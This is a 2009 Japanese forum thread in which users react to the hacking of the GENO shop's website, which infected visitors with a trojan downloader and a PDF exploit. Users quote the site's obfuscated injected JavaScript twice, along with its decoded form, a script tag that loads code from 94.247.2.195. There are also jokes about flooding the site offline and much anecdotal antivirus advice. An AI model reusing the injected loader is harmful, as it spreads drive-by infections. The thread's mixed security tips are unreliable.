９のdebug版使えよ

タスクマネージャー→パフォーマンスを開くと開いた瞬間は７０％ぐらいで直ぐに1桁台になるんだが
なんかウラでやってるよなあ。

このトロイは一番抜いてるエロ動画がなにかバレてしまう

>>587
重いか軽いかは分からんがスクリプトで実行速度が〜ってのがよく起こった
IE更新したら直ったからIEのせいかもしれんが

>>595
これはヤバイ

このウィルス国産なのかどうか知らんけど世界中に拡散して
一向に解決されなかったら酷いことになりそうだな

GENOの名が世界中に知れ渡るね

それが狙いか・・・！

まさにＰＣ界の鳥インフ

>>590
この流れをしっかり踏襲しただけのことさ

562 名前： キバナスミレ(関東・甲信越)[] 投稿日：2009/04/05(日) 17:25:01.57 ID:vha5s7Cg
>>553
俺AdobeReaderなしFlash最新版でその上Javaスクリプトoff、ActiveXもoffで踏んだのに感染した
ちなみにセキュリティソフトはNIS2009
今の所どんな対策しても感染は防げないんじゃないか
577 名前： キバナスミレ(関東・甲信越)[] 投稿日：2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570
アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた

堀宮のサイトもトロイが出たらしいが

春休みが明けてからで良かった

>>590
CMD.exeを実行して閉じてタスクマネージャ見てみ、conime.exeがあるから。
CMD.exeを使ってないしCMD.exeを使うソフトを入れてないのにconime.exeがあったら
何かがCMD.exeを使ったってこと。

>>588>>589>>596
ちょっとしたバナー広告でも固まったんだわ
他のブラウザ入れてみるか

>>605
ttp://hpphmd.blog104.fc2.com/blog-entry-15.html
てあるけどconimeがあったら感染してるってこと？

conime.exeはコマンドプロンプトで日本語入力をするためのもので、コマンドプロンプトを起動させると一緒に起動する。
よって無害。CMD終了しても残ってるけどなｗ

ためしに、CMD起動→conime終了やってみながら日本語入力試してみろよ。
Alt+半角/全角　で終了前なら入力できるけど、終了後はできないだろ？

おれもさっき知ったけど、まともな頭ならこの位ググれば出てくる。

1 CMD起動
2 Alt+半角/全角　で日本語入力してみる
3 Alt+半角/全角　押してオフにする
4 conime.exe終了
5 Alt+半角/全角　押してオンにできるかやってみる

一度コマンドプロンプトを起動したら終了してもconime.exeは動き続けるよ
タスクマネージャから終了しても何の問題もないけれど

>>609
conimeが使ったメモリ空間は終了させても開放してくれないのがMS公認の仕様らしいが
微々たるものか

>>607
＞netstat -aと-nbもやってみたけど、94.247.2.195はなかった。

>>607
このウィルスを食らった場合以外でも自分でコマンドプロンプトを立ち上げた場合とか、
それ以外の場合でも何かアプリケーションをインストールしてWindowsを再起動した直後の場合とか、
既にインストールされているアプリケーションが起動される際に何気に勝手にコマンドプロンプトを使っている場合もあるので、
必ずしもconime.exeが実行されていたからと言って、必ずしもウィルスに感染しているとは限らない。

おいらが言ってる事が理解出来ないレベルなら、
あれこれ考える前にとっととリカバリするなりクリーンインストールし直したほうがいいよ。

とりあえず普通に再起できて94.247.2.195と通信してなかったらセーフでおk?

なんか同じ流れがずっとループしてんな

>>613
あれこれ考える前にとっととリカバリするなりクリーンインストールし直したほうがいいよ。

まとめサイトはまだ作られてないんだ
以前のイメピタとかニコニコに偽装してたzz.tcはすぐにまとめが作られたが今回は遅いな

俺にも感染した
頭痛くてすんごい鼻水出る

>>602
これが本当ならいよいよやばいな

まだやってたのか
不安を抱えた情弱が騒いでるだけみたいだが

この調子だと、無職で童貞なのもGENOのせいになりそうだな

NoScriptは神。

>>619-620
ここは過疎板のパソコン一般板とは違ってID出るから
あからさまな工作しても笑われるだけだよｗ

>>622
何と戦ってるんだよ？
ウィルスとだけ戦えよ

readerアンインスコした

いっぽうイタリアでは大地震が起きて先に町があぼ〜んしていた

はじめてvistaで良かったと思ったｗ

>>625
今知った、大変ねえ

ウイルスなんて見て見ぬふりですよ

>>625
正直、北朝鮮のミサイルよりもイタリア直下型大地震よりもGENOウイルス俺直撃事件の方がうんと重大だわ。

なんだMacは論外なのか寂しいじゃないか

AdobeReaderインストールしてないで
代わりに別のPDFソフト使ってるんだが大丈夫かな

>>626
初めてXPで泣いた

>>630
MacのSafariは数年前のブラクラも防げない代物だから使えない。

初めてNoScriptってやつを入れてみたがサイト開くたびにいちいち禁止されてます出てくるのが便利だが煩わしいな
慣れるまでの辛抱か

とりあえず
https://addons.mozilla.jp/firefox/details/722

ツールバーを右クリック→カスタマイズでnoscriptのアイコンをツールバーに追加しておけばいいんじゃないかな。
そうするとオン・オフの切り替えがやりやすい。ステータスバーにも一応表示されてるけど。
あと、ブロックしたとかの通知のオン・オフはオプションで消せるよ。

お前らRegSeekerから幾ら貰ってるんだよｗ

>>634
ホワイトリストを作成するのに結構時間がかかるよ。

GENOのサイトは完全復旧したの？
まだトロイ仕込まれたまんま？

見つけられんが空き容量が減っていってる
これは黒と思うべきか…

>>634
自己責任で大丈夫そうなやつとかはWhitelistに入れればいいだけだし
ヘンなモンもらうより全然マシだよ

今回の件でgenoと電話が繋がったりメールで対応来たひといるん？

大丈夫そうな奴をリストに入れておいても
それが今回のようにハッキングされたら一緒なんじゃ…

>>640
Avast!いれてそれでも心配ならおいで

なんだこれやばかったのか。
ほとんど報告が無い頃に踏んじゃって、
何だこのサイト異常にメモリ食ってブラウザ落ちるなーと思って何回か開いちゃった。
その後再起動とかもしてるけど特にPCに違和感は無い。
XP、火狐、AVGなんだが大丈夫かな？

>>645
再起動とかもしてるけど特にPCに違和感は無い。
XP、火狐、AVGなんだが大丈夫かな？

これで大丈夫だと思えるのが不思議

地味に伸びてるね。もう6か
GENOもしかしてまだ対策してないの？とりあえず閉鎖くらいしろよ
4月は踏んでないが先月買い物したからなぁ。個人情報が…

>>540
今のところかかったら特効薬は無い。
死を待つか再インストールのみ。

確実にひっかかった。そこまで重くなってもないし、最低限の作業はできるけど
aviraとかセキュリティソフトのアップデートができない。
今カスペインストールして調べてみるところ。あーなにやってるんだろうなこれ。
ＰＣ詳しくないからさっっぱりわからん。抜かれて困るようなものは特に無いのが救い・・・

なにか関心の集まることがあると偽情報を流したり危険サイトへ誘導
しようとする奴が即座に現れるようになったな・・・

>>643
俺もそう思う。

臨時メンテｋｔｋｒ

復帰した

コレはサーバーとユーザー両方の穴を狙ってるからね
しかも、
撃ちこむ実行ファイルの内容は簡単に変更できそうだし

詳細が広まってサーバーとユーザー両方で対策されるまで
亜種がゴロゴロ出てくると思うから
GENOに使われたのだけ禁止リストに入れても安心は出来ないだろうな

しかし、GENOの対応は最悪だな

アスキーに教えておこう

アリアハンでスライム潰してたら、いきなりギガンデスに襲われたようなものだ

　 ｲ｀ﾍ
　/: :| ヽ
/ : :/　　ヽ　＿＿＿　　　_,,,:. .-: :´彡ﾌ
_ノ＼＿∠: : : : : : : : :｀: :-: :,:_:／彡　/
　　　　　 ( : : : : : : : : : : : : : : ｀ゝ　 /
　　悪　　r::/: /: : | : : : : : : : : ::＼ /
　　 　 　//: /: : : |: : | |: : |: _: : : :ヽ
　　心　 {/ 7|｀＼/i: /|:|／|´: : : : :|ヽ
　　　　　〉 ,‐-‐､｀|7　|| |_::|,_|: : :|:::|: |
　　死　／ r:oヽ`　　 　/.:oヽヽ: :|: | :|
　　　 　{　 "ひ)　　 　　ｲびゞ　/: :|N
　　了　 |　ヾ:::ソ　　,. 　 ヾ:::ｿ /|: : |
　　！　ヽ::::ー-..　　ゝ　 ..ー-::: ヽ::|　r--ッ
-tヽ／´|｀::::::::::;　ヽ⌒＞:::::::::::　/: i　}　 ＞
::∧: : :|: |　　 　　 └ ´　　 ／::i: | /＿ゝ
. ＼ヾ: |::|｀ - ,, ___　　_ ,, - ´|: : :|:::|
　　 ヽ: |::|＼　　　 ￣/ /|　　|: : :|: |

どこのアンチウイルスメーカーもこの件についてアナウンスしないな。
というか、GENO自体が検体提出をシステム的にやってないのか？
前に雑誌で見たときにはノートンは２４時間体性でウイルスを
チェックしてすぐにパターンを出せるって言ってたのに、いまだに
部分的対応しかされてないし、それは他も同じ。
ＨＰのコンフリッカーワームにご注意！ノートンを導入していれば
脅威から守られています。とかアホらしくて涙が出てくる。

いたちごっこになることを望む　ラトビア人VSGENO

それっぽいリンクとか踏んだ記憶ないけどこういうの見ると不安になるんだよな
それでスキャン始める

昨日余裕だろって思って開いたのだが。
これ感染したかどうかすらわからない。
わかる方法あるん？

まぁ他にも気づいてないだけで、やられてるとこもあるだろうしね
何がしたいのかよく分かてないってのが不気味よね

ようやく直ったのか？

>>608
どこから起動しているかが大事

ただここのサイトが直っても上で言っているように亜種やそのほかのサイトにも拡散していそうだから、
安心は出来ないね。
しかも、決定的な駆除方法が確立されてないから踏んでしまえば、
もはやOS再インストールしか生きる道が残されないし。

今のRegSeekerは普通に使えると聞いた
ちゃんと旧Ver指定したコピペもあったはず

6

これニュースで流すレベルだろｗ
誰かしらんがテレビでてるやつのブログもやばい状態だったんだろ？
これPC初心者とかウイルスの事さえ知らんぞｗ

>>664
どこからだとヤバいの？

コマンドプロンプトを立ち上げて
(*´Д`)ハァハァ
をコピペしてEnterすると感染してるかどうかわかるよ

>>664
WINDOWS2000だから誰が起動してるかわからんＷ

>>669
窓使いじゃない俺に聞かないでくだしあ＞＜
system32（WINDOWSだっけな）以外
すまん自信ない

>>672
それはすまんかった
ありが�d

>>33
>●TrendMicro 8.700.0.1004
>　2009.04.03 PAK_Generic.001
これはVirusTotalなどでの結果だと思うが
「Packerですよ」(圧縮みたいなもの)と言っているだけで
実際は検出しない。要提出。

また感染してるじゃねーかｗｗ

どうなんだ？
まだ踏むとやばいのか？

>>675
なにしたんだよ？

>>671
違うタスクマネージャ入れたら見れたような記憶違いのような
プロセスの場所も見れるからそれで確かめるのもあり

>>677
さっきまたGENOがウィルス配ってた

特集にアンチウイルスソフトがあるのは泣けるなｗ
それもページクリックしただけで感染

くばってたな。妙なJSあったな。
ウイルス復旧。乙

マジで！？
直ってないのか？

ターちゃんの中古部屋、オススメするなよｗ

genoにアクセスしなければいいだけだろうがｗｗｗｗｗｗｗｗｗ

オレはチャレンジャーだから常にキャプチャーソフト立ち上げて覗きに行くぜｗｗｗ

http://blogsearch.google.co.jp/blogsearch?hl=ja&ie=UTF-8&q=geno&btnG=%E3%83%96%E3%83%AD%E3%82%B0%E6%A4%9C%E7%B4%A2&lr=lang_ja

今回の件の記事が増えていていいことだ

GENOの鯖、完全にクラックされてんじゃねーの？ｗ
もしくは、管理権限もってる奴のPC

genoにアクセスしてみたけど特に何も起きない。つまんねー

AVGの更新はいつしたの？
昨日19時ぐらいに更新してスキャンしたんだが

　　　　　　　　　　　 (ヽ三/)　））
　　　　　　　　　＿＿　 ( i)))
　　　　 　　　／　　　　　＼　＼
　　　　　　／／･＼ 　／･＼＼ ）
　　　　.／:::::: ￣（__人__）￣::::＼
　　　　| 　 　(⌒)＼　　|　　　　|
　　　 ,┌､-､!.~〈　　＼_|　　＿/
　　　 | |　|　|　 __ヽ、　　　/
　　　 ﾚレ'､ﾉ‐´　　￣〉　　|
　　　　｀ｰ---‐一'￣

>>665
流石に大手サイト（大企業や人気サイト）には感染しないだろう？

対策としては
avast!とJavaスクリプトOffとAdobeリーダー9が最強なの？

GENOがウイルス仕込まれて３日経つのに
何の対策もしてこないのな。
どうなってんだよ。また仕込まれてんのか？

Genoの.jsなんだが
<!--
document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
-->
なんだよこれ、ウィルス復旧してんじゃねぇかｗ
ファイルを元に戻しただけで、そもそもの外部からの侵入口は開いたままだったのかｗｗｗ

ID:aQV3b+FBは良い仕事してるな

損失は計り知れないな。

>>692
それプラス、ラトビアへの接続全て切るのだな。
ルーターかフィルタリングソフトで特定ＩＰアドレス範囲を
切るやつがあるのでそれで切っておけば、GENOウイルスの活動は阻止できる。
オレの環境ではロシア・中国・韓国・台湾・香港・イタリアは元々切ってる。
今回、バルト３国追加した。

>>694に直してもらうといいぞ、糞GENO

ほんとにまた例のアドレスに繋ぎに行くなw
まじ糞だろgeno

ウィルス貼った奴とGenoマジで許さないからな
俺は本気でむかついたから誰か通報して怒っといて

もう倍王で買うからいいよ

>>694
復帰してやがる。
「むしろワザとやってんじゃねーのか？」
としか思えない。

てめえでやれよｗ

>>700
またお前かｗ

>>700
せめて怒るぐらいはてめぇでしろよｗ

メンテナンス入ったｗ

祭り中のスレに短縮ウイルス貼ったら
引っかかる奴すさまじいだろうな。
短縮ウイルス貼ったら、貼った奴はどうなるの？
アク禁？

>>707
損害賠償に発展する可能性

クッキーなんかニコ動とようつべしか許可してません。

>>697
おー！すげー！
そのIPアドレスリスト希望

ラトビアってトラフィック攻撃サイコガンだっけ？

あれ、またアクセスできる・・・。

>>707
会社からZIPを落とそうとして引っかかった哀れな人がすでにいたようですが

JSをOFFにしてても一度食わされたら→現状終了
ナニやってるか現在解らんし比較的新しい穴みたいなので明確な対処方法は不明。

正確な対応は現状お手上げ。GENOがウイルスをどっかに報告してノートン先生なりが対応してくれるまで詳細不明。
そしてそのGENOのサイトで今だ改善されてないのでとっとと閉じとけと。

とりあえずGENOはマトモにIPS運用汁。

p://www.geno.co.jp/xmlrss/07/geno_xml07.js

これの最後とか本当に再発してるな

Genoさんウイルス復活おめｗ

一応、親のパソコンのAdobe Readerアップデートしておいた
ver.7だったな

ブルースクリーンってどゆこと

>>417
俺も送っておいたら返信が来た。
次回更新で対応するみたいだね

>>700
お前はVIPのオレンジ君に通じるものがあるなｗ

>>710
ttp://ftp.apnic.net/stats/apnic/delegated-apnic-latest
これ参考にしたら？

青い画面

>>692
現状一度食わされた後はナニやってるかわからんので→終了

GENOがどっかにウイルス検体を提出して対応してもらうまでどーにもならん。
そもそもISPが導入されてるかも若干怪しい気がする。

って事で長引くんじゃないかい？

再発してるしPDFファイル名が変わっとる＞＜

対策取れないなら
いいかげんに諦めてWeb閉鎖すれば良いのに

>>716
おれはとりあえずしばらくネットは使うなって言っておいたｗ

GENO「なんか騒いでるのは一部だし〜、特に実被害もないし〜、ぶっちゃけ販売システムが壊れてなければどうでもイイし〜」

こいつで駆除だ！
ttp://www.trendflexsecurity.jp/free_security_tools/housecall_free_scan.php

まだ対応してないの？

geno_xmlXX.js また全部改竄されてるなｗｗｗｗｗｗ
おもしろすぎｗｗｗｗｗ

なんかもう怖くてサイト気軽に踏めない
とりあえず>>697みたいなアドオンでもないか探してみよ

GENOウイルスの名は伊達じゃない

PG2導入しようと思ったら、日本語版ダウンできねえｗ

ルーターで切っちゃうのが手っ取り早いよね

そういやPG2で海外全部弾いてたな…

>>729
そんなアドオンあるのかw

これは意図的にウイルス流してるんじゃね？

すげーぜgenoさん、ウイルス仕込まれまくってるな
今のとこ検知してるからいいけど新種仕込まれる前に
特攻するのも自重した方がいいか

ネットじゃなくてGENO本店でなんか言ってた？

>>720
英語よくわからんがありがと
>>722
一度も踏んではいないんだが今後踏みそうでコワいわ

>>524
avast!口ほどにもないな

とりあえず対策に書かれている

94.247.2.195(94.247.[2-3].[0-255])への接続を遮断

を「ルーター」に設定。クライアントはもう食ってると思ったら諦めてコレをしておくべき。

外付けのHDDも感染する？

再起動する時いつもと変わらなかったけど
これは感染してないってことだよね？
ちなみにノートン先生でスキャンしても何もなかった

>>730
なんこか前のスレでGENO再度(集団虐殺)て言ってて上手いなあ！と感心した

もしかして、故意にウイルスを拡散させようとしてるのではないか？

>>710
おれは
http://www.vector.co.jp/soft/dl/winnt/net/se316799.html
これ使って抽出した。
けっこう時間かかるが、１時間もあれば好みのＩＰリスト作れるはず。
貼ろうと思ったが、長すぎるので断念。

サイバーポリスと警視庁とかに通報しといてよ
あとマイクロソフトにも

>>738
ttp://fedorasrv.com/pppoe-iptables.shtml
参考にどうぞ。これはiptablesで弾く場合だけど。

geno_xmlXX.js のタイムスタンプ、4/7 07:57 ？

94.247.2.195なければ大丈夫ってわけでもない？

インディーズバンド†GENO†、ｶﾜｲｿｽ

>>745
おー！ありがと！

>>747
こちらのお方もありがとー！

>>749
94.247.2.0/23（94.247.2.0〜94.247.3.255）っぽい。

糞会社
導入事例：株式会社GENO 様 システム概要｜IT SOLUTION

>>723
マジなら二次被害が出るな。ｵﾜﾀ

>>741
データ全消去してから一度フォーマットかけるべき

>>173専ブラで開こうとして表示されなかったんだけど大丈夫かな
ちなみにノートンでスキャンしたけど特に何も無し
再起動してもいつもと変わらなかった

>>714
"<script src=//94.247.2.195/jquery.js></script>"

が出力されるようになってるｗ

>>755
マジかどうかはその目で確かめてくれ www.kakiko.comが怪しいかどうかは
ググって調べてくれ。単にソースを表示するサイトだって分かるはず。

http://www.kakiko.com/check/?url=http%3A%2F%2Fwww.geno.co.jp%2Fmt.js

<!--
document.write(unescape('%3CsoQcripB9tmO%20smOrc%3DB9%2F%2F94tNt%2EtNt2fq4YMj7tNt%2Ew22YMj%2E19N65rz0%2FjqueryB9%2EmOjoQs%3EBn%3C%2FsmOctNtriN6ptNttYMj%3E').replace(/w2|oQ|YMj|fq|rz0|B9|tNt|N6|Bn|mO/g,""));
-->

ウイルスさん更新されたの？
作者というか改変したやつは豆だなあ

>>757
ソースみたらただのブラクラだからこれといって異常がなければ大丈夫だろ。
不安ならキャッシュを消しておけばいい。

タスクマネージャーみてもそれっぽいのいないしCPU稼働率も10%以下で落ち着いてるし感染してないと見ていいかな
マジで怖いわ

GENOがまた改竄されてるか
juicyrock.co.jp は大丈夫なのか

>>757
Avastだと画像キャッシュにトロイが検出される

>>761
くだらん質問に答えてくれてマジサンクス
安心したわ

94.247.2.195　＝　hs.2-195.zlkon.lv

.lv ＝　ラトビア

ラトビア
http://ja.wikipedia.org/wiki/%E3%83%A9%E3%83%88%E3%83%93%E3%82%A2

※ 単なる踏み台かも知れない。

>>760
暗号化方式前と違うなｗ
多分、botか何かだと思うけども、ファイル名と
スクリプトを毎回変えてくる辺り、定石を踏まえてるね。

げの見に行ったら本当にファイル名変わっててﾜﾛﾀ

誰かメールで教えてやれよ。こんなの撒き散らされたら
たまったもんじゃねーよ。なんだよこれ。

>>766
シナの踏み台と見てるが

これはもうだめかもしれんね。

お、いまさっき、
://XXX.geno.co.jp/xmlrss/07/geno_xml07.js
のウイルスコード消えたｗｗｗ

ＧＥＮＯの中の人？見てますか？
やってもまたウイルスで更新されちゃうんだから、
侵入経路判明するまでサイト閉鎖しろ。
これは心からのアドバイス。

p://94.247.2.195/jquery.js　が更新された時間↓　PCの時計合わせてないのかな？？
Last-Modified: Tue, 24 Feb 2009 15:56:18 GMT

GENOはもうダメだろうな。　危機管理体制が終わってる。

まさにいたちごっこ

>>772
GENOにセキュリティー担当で雇ってもらえよ

いっそ田代砲で落してあげたほうが、武士の情けのような気がしてきた

>>719
ワロタｗｗｗｗ

あいつもウイルスで自爆したんだよな

>>771
× これはもうだめかもしれんね。
○ これはだめかもわからんね。

機長にあやまれ

しかしよく出来たスクリプトだな。　これ書いてるやつはjsを完璧に使いこなしてるわ。

cyberpolice.go.jpにお願いして強制的にサイト閉鎖してもらうしかないな
やつらこのまま営業続ける気だろ

国内中古リユースが高まるとおいしくない諸外国の仕業

>>764
そのavastてのを使えばいいの？

GENO閉鎖できません！！

>>780
このままウイルス感染→ファイル上書きってアホみたいなことを
これから何年も続けるかもしれん。

あのipaに報告しておきましたよ

>>785
あいつらロリポル落とすのが本命の連中だから
どうにもならんだろ。

やべえノートン先生期限切れで脂肪中だ
不安だし金払うか…

>>780
冗談抜きでやってもらうしかない
危機感がなさ過ぎるっつーか有耶無耶にしようとしてる節がある

田代砲で潰すか

助けて！ネッポポリス！

>>754
その会社がサーバーごと管理してるんかいな

>>782
avast！
Adobeリーダーインストールしてるなら9にアップデート
Javaスクリプトonにしてるならoff
ラトビアをブロック

ほかはこのスレを参照

「ＧＥＮＯざまぁｗｗｗ」的な発言が目に付くんですけど
このショップって嫌われてる？

ますます訳わかんねｗｗ
再起動しても大丈夫だったし
このまま放置するわ

avast！avast！avast！
って、「！」を製品名につけるとこっぱずかしいなｗ

>>769
GENOは昔っからメールガン無視でつよ

>>787
http://pc11.2ch.net/test/read.cgi/sec/1227794006/
お好きな体験版をインスコ汁

随分続くなこのスレ
被害者多いの？

>>794
タスクマネージャ起動してsvchost.exeがあったら気を付けろ。

>>793
俺は嫌い
自作系の板とかでしつこく宣伝してくるから

メンテはじめたよ

524 ： シンフィアンドラ・ザンゼグラ(アラバマ州)：2009/04/07(火) 02:37:04.72 ID:aXhN0DBC
踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。
IEのテンポラリに残ってた。
jquery[1].js　感染：Trojan-Downloader.JS.Agent.dwf
A0G6M8XZ\Vy[1].pdf　感染：Exploit.Win32.Pidief.aog

Avast!は最新版でも、このファイルを検出しなかった。
Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。
どなたかの参考になれば幸い。

avast!最強伝説は終焉した

>>795
すごいよ！！マサルさんみたいな感じか

>>798
ネタ元が続行中なのに続かないわけがないと思うんだ

>>795
たしかに…ｗ
あの警告音が！←に値する

まだ閉鎖できないのか

>>805
あれはマジで心臓に悪い
入れたら速攻サウンドオフｗ

>>799
あったよ

とりあえずfoxit更新してきた
怪しいURLは踏んでないしこのウィルス知ってからスクリプト切ってるし
特に挙動も怪しくないから大丈夫だと思いたい

しかしノートン死亡
マカフィー嫌いだけど一括で入ってるし利用しようかねえ

>>802
Avast!は接続をさせないのだｗｗｗ

avast昨晩うｐされたexeには無反応なんだし過信は禁物じゃないか

ぷいーんぷいーん

所詮は無料だしな
今回検出出来たのもたまたまだろう

>>798
今年で一番被害者多いんじゃないの？ここ5年ウイルスとは無縁のオレでさえ
再インストールさせられたぐらいだから。
GENOなんて全く関心も無いし、知りもしなかったのだが、
zip偽装の短縮を踏んで飛ばされてアボーン。酷すぎる。
まあ、調子のって、マロにZIPを持っておじゃれ。とか言ってたからなんだがＷ

感染URLは?

>>813
まあ、そんな気はするけども、
全てを完全にスルーしたノートン先生よりはマシだろ。
なめてんのかと思ったよ。インタネットセキュリティだったら
防げたのかな？そっち入れてる人の状況知りたい。

http://94.247.2.195/

no siteってなってる

斧で手に入れたLa.exeに俺のBDちゃんは何時になったら反応してくれるんだろうか…

感染したのかしてないのかわからんからスキャン廚

Tempだけだったら電源切るだけで消えるから助かる

ノートンインタネットセキュリティは完全スルーだった

>>814
ｈｔｔｐのステータスコードの300番台を無視するような機能があれば、
その手の被害はかなり防げそうだな。

>>817
ブラクラ化して営業どころじゃなくなってたから閉じたのか。

今のメンテって改竄の対処よりセールの準備っぽいな。。

>>824
このまま行くと閉店セールになりそうだなｗ

>>799
あったけど今のところ駆除できないんだよね？

今の状態でセールしたら凄いことになるだろうな…
セールだと言ってurl貼りまくる奴が現れるだろうし、阿鼻叫喚な図が予想されるｗ

東大生が飲酒運転で事故をmixiで報告
ttp://tsushima.2ch.net/test/read.cgi/news/1239052782/

現在祭り中です。
魚拓と証してzipなどのURL短縮ウイルスを
混ぜて貼らないように注意お願いします。
祭りには短縮ウイルスのことを知らない人も
たくさんいますので絶対に短縮ウイルスの
URLを貼らないように注意おねがいします

ウイルスを踏まないと買えない閉店セールとか。
それでもバックアップあるから、俺は買うぞ！

謝った方がいいと思うんだがなぜしないんだ
別に訴訟起こされる訳でもあるまいし

かぁちゃんのパソコンが感染してた
誰だよ鬼女板にはったやつは

GENOは福袋でｼﾞｬﾝｸ入れてきて
ｸﾚｰﾑは全てｶﾞﾝ無視
商品の程度も悪いしサポートは最悪

今回も何事も無かったように営業継続です

再インストールするついでに丸４年使ってきたHDD変えたいから
WDかSGが日立のIDEHDDの容量大きくて安いやつ紹介してくれｗ

>>828
　　｜押すなよ！
　　｜絶対に押すなよ
　　 ￣￣￣|／￣￣￣
　○　 　○
　に　 ／｜
　>ヽ ｜⌒|＿＿＿＿|

>>833
GENOで買えば?

>>828
ダチョウ倶楽部かよ

>>694
g,""));

ありゃ？　またメンテ中？

ネトゲだと結構前からある手だけど
何の情報抜いてんだろうな

そういえばフレッツウイルスクリアでも検出された

URL偽装って短縮urlサイトを悪用した末尾偽装だけ？
それともいくらでも自由に偽装できるもんなの？
後者なら実在の安全なサイトのrulを少しいじった感じに偽装、とか全く見分けようないな…。

>>833
ヤフオクで探せ

osusume.js, osusume_shouhin.js にまだ残ってるぞｗｗｗｗｗｗｗｗ

>>843
お勧めなら仕方がない

>>823
>>817はラトビアのアドレス。

GENOの力じゃ復旧は無理だな

ノートンじゃ検出できないんだよね？
ＰＣ初心者だからよくワカンネ

>>173が例のウイルス？

GENOなんて知らんけどおまえらあちこちに種まいてたりすんの?
janeの自動画像DL切っといた方がいい?

いやいやマカフィー入れてみた
La.zipがサクッと反応してサクッと消しやがった
なんかマカフィーのくせにムカツクｗ

GENO・・・・メンテナンスしてまだウイルス配布してるじゃんか・・・
おいどうなってるんだこのPCショップは・・・

東京大学 理科一類の学生が飲酒運転で事故をmixiで報告
ttp://tsushima.2ch.net/test/read.cgi/news/1239052782/

現在祭り中です。
それらしく短縮ウイルスを貼らないように
注意お願いします。 祭りには短縮ウイルス
のことを知らない人も たくさんいますので
悪ふざけで絶対に短縮ウイルスの URLを
貼らないように注意おねがいします。
なお本人を含め、東大の方々がスレにいらっしゃる
恐れがあるので決して悪ふざけはしないように
おねがいします。では。

>>848
専ブラなら問題ない

しかしどういった経緯でそういう事態になったんだろな

>>852
そういうコピペはアク禁対称だからな？

>>833
ttp://kakaku.com/specsearch/0530/

俺も二回小沢のAA貼って●焼かれて二度とコピペしなくなったわ
漫画喫茶からいいんじゃね

>>855
私はアク禁対象になる方を未然に防ぐ目的ですので
良心から出た行為をアク禁対象にするとは思えません。

理由が何だろうがマルチはアク禁対象だ

>>287
遅レスだがCookieSafeマジお勧め

>>848
自分は
janeで踏んだんだけどエラーで表示されなかった
再起動しても問題なかったみたいだけど
アンチウイルスソフトavastだとキャッシュからトロイが検出されるらしい
試してないからよく分からん

java止めたからアニメ見られないお・・・

>>858
そんな言い訳、２ｃｈ運営に通じるわけないだろ。
興味ないからって理由でＹＢＢを１ヶ月規制したような
連中だぞｗ
一応、おまえの書き込み全部報告しておくから規制は確実だろうな。

とりあえず、ゲノがマトモな店じゃないのはよくわかった。

アク禁ﾜﾛﾀ

上流の有線に連絡してるよな？

>>864
だな
店がウィルスで荒らされてるってのに無反応とか狂ってる

絶対ゲノでは買い物しないことに決めたわ

>>865
アク禁にはならんよ
書き込みができなくなるだけだから

まだ対応してないのか?

誰かスラドに記事投稿してくれませんか。
投稿しようと記事入力してたけど、オレには文才が無い事を忘れてた。
少しでもウィルス被害を食い止める為に、多くの人に知らせる必要があると思います。

>>821
何時パターンファイルアップデートしたの？
今朝(am7:00)の段階で検出出来る様になってるよ

>>853
専ブラなら問題ないの？
まじで？

さすがカスペちゃんや！ようやってくれた！

GIGAZINEあたりが取り上げてくれないかな

>>872
特殊な設定にしてた場合は別だけど
jpgの場合は、ビュアーで開くだろ？
ビュアーはファイルが実はhtmlだったとしてもjavascriptを実行しないから問題無い

la.zip

Virus.Dropper, Trojan dropper

>>864
福袋の頃から怪しい店だなと思っていたよ。
でもまさかウイルスとは・・・涙
職場のＰＣ感染させてしまった。
スクイズを気をつけていたのに２ストライクになって安心したところで決められた心境。

>>872
日曜早朝に踏んでさっきほどバックアップから復元したんで
昨日以前のパターンファイル
今はVirtual PCで探りに行ってる

アンカー間違えたｗ
>>871ね

>>757
専ブラプレビューはセーフ

今朝からノートンでも検出できるようになったみたいだから
スキャンしてみる
後は神のみぞ知る

良品中古
WindowsXP Proインストール済み

というPCがウイルスに感染していてもスルーされるわけだな、GENOでは。

GENOもあほだけど感染者もあほだよ

俺、もうAviraだけじゃ怖いからavastと二大体制でいくわ・・・
マジGENOしね、二度とかわねーよ

>>884　どっちかにしなよｗ

10時回ったのでgenoサイト見てきたけど、変化無し。
でも、ﾄｯﾌﾟﾍﾟｰｼﾞだけ差替えで、後は放置って、まだ事の重大さに気付いていないようですね。

入れてて良かったandLinux

>>885
とあるサイトに飛び込んだらaviraが反応した（調べた結果ウイルスだった）
別のサイトに飛んだらAvira反応なしでavastが反応した（上記同様）

別に実感できるほど重くなってないからこのまま行く・・・

AVGは更新きたの？

GENO以外で危険な所って有ったの？

まあ今回ばかりはVista大勝利だなｗ

>>888
アップデート AVG - AVI 270.11.44/ 2044
検出の増強 新種のトロイの木馬 Generic13.UQF, Downloader.Delf.CFR, SHeur2.ZOQ, BHO.IHI, Dropper.VB.CCR, Worm/VB.FIG

2009 年 4 月 6 日

>>884
俺も2AVにしたわ
BDとClamAVこれでかつる！

>>700
また他力本願ｗｗ

上の「トップページ」以外をクリックすると
左にメニューが表示されるけど
そこをテキトーにクリックすると発動するから気をつけろ

しかし何なんだこの低レベルな対策は…

Vista厨大勝利！
XP厨ざまあｗｗｗ

感染した
avastとa-squadでフルスキャン
ATFクリーナーでテンポラリ全滅
リーダー＆フラッシュをアップデート
ラトビアIPを遮断

不振な動きは無いけど心配だな

>>872
仕込まれたスクリプトが実行されない限り大丈夫だと思う
専ブラは画像だけ取得しただけだから問題ないはず。
IEコンポとかのブラウザでアクセスしたら問題あるだろう

>>895
ハンカチ貸してくれよ

XPだがadobeのFlashもReaderも最新だった俺はなんともなかったようだ

>>745
ヴェクターすごいｗ

今度はブロックされるけど内容は表示されるんだな

ところで、ノートン今日のアップデータで削除までしっかり対応したの？

とりあえずオレが管理者なら鯖を落としとくわ。

そもそもＰＤＦ再生ソフト無いから無問題だった

スパイウェア対策ソフトでオススメどれだよ

鯖落とせばいいのに
